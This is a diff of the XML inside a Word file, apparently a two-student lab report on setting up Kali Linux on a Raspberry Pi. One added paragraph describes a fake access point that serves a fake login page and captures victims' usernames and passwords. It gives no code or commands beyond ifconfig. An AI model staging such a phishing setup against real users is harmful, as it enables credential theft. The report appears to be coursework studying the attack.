+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
+    <w:name w:val="Heading 3 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading3"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="002A4645"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="27"/>
+      <w:szCs w:val="27"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="ListParagraph">
+    <w:name w:val="List Paragraph"/>
+    <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="34"/>
+    <w:qFormat/>
+    <w:rsid w:val="002A4645"/>
+    <w:pPr>
+      <w:ind w:left="720"/>
+      <w:contextualSpacing/>
+    </w:pPr>
   </w:style>
 </w:styles>
 </file>

--- a/Project1/Project_report.docx
+++ b/Project1/Project_report.docx
@@ -206,25 +206,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="37"/>
         </w:rPr>
-        <w:t>Wanze LIU (z5137189)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="37"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="37"/>
-        </w:rPr>
-        <w:t>Zhou JIANG (z5146092)</w:t>
+        <w:t>Wanze LIU (z5137189), Zhou JIANG (z5146092)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -385,27 +367,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">In this task , firstly ,we install the kali </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>linux</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> system in the raspberry </w:t>
+        <w:t xml:space="preserve">In this task , firstly ,we install the kali linux system in the raspberry </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -441,27 +403,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve"> on the raspberry pi and open the terminal typing `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>ifconfig</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>` command it shows there is no connection with internet in wlan1 which means no ipv4 address been allocated to this machine we are using, and then we initialize the connection to the WIFI , we input the command again, it show the allocated ipv4 address in wlan1</w:t>
+        <w:t xml:space="preserve"> on the raspberry pi and open the terminal typing `ifconfig` command it shows there is no connection with internet in wlan1 which means no ipv4 address been allocated to this machine we are using, and then we initialize the connection to the WIFI , we input the command again, it show the allocated ipv4 address in wlan1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -559,27 +501,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">it </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>can not</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> connect the</w:t>
+        <w:t>it can not connect the</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -628,9 +550,106 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>Task</w:t>
-      </w:r>
-      <w:r>
+        <w:t>Task3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>task</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2 , the victim have alreadly connect to the fake AP, in this situation, as long as victim machine try to browsing the web, the fake login webpage will show in front of the victim and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>mis</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>guide them to enter the username and password, this confidential information will capture in the backend of the raspberry Pi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:b/>
@@ -638,8 +657,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -649,19 +667,59 @@
         <w:spacing w:line="360" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>I</w:t>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Task1 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">we downland the image of kali linux and using balenaEtcher to install the OS into the raspberry Pi, after </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -670,92 +728,115 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
+        <w:t>it</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>turn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">we open the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>term</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>inal and i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
         <w:t>n</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
           <w:color w:val="000000"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>task</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>2 ,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the victim have </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>alreadly</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> connect to the fake AP, in this situation, as long as victim machine try to browsing the web, the fake login webpage will show in front of the victim and </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>mis</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>guide them to enter the username and password, this confidential information will capture in the backend of the raspberry Pi</w:t>
+        <w:t xml:space="preserve">put </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>`ifconfig` to check whether the internet card connect to the internet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> before and after we connect to the internet.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -766,6 +847,7 @@
         <w:spacing w:line="360" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
           <w:color w:val="000000"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
@@ -786,6 +868,16 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Task2</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -795,404 +887,28 @@
         <w:spacing w:line="360" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="360" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="360" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="360" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Task1 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="360" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">we downland the image of kali </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>linux</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and using </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>balenaEtcher</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to install the OS into the raspberry Pi, after </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>it</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>turn</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>on</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">we open the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>term</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>inal and i</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>n</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">put </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>`</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>ifconfig</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>` to check whether the internet card connect to the internet</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> before and after we connect to the internet.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="360" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="360" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="360" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="360" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="360" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
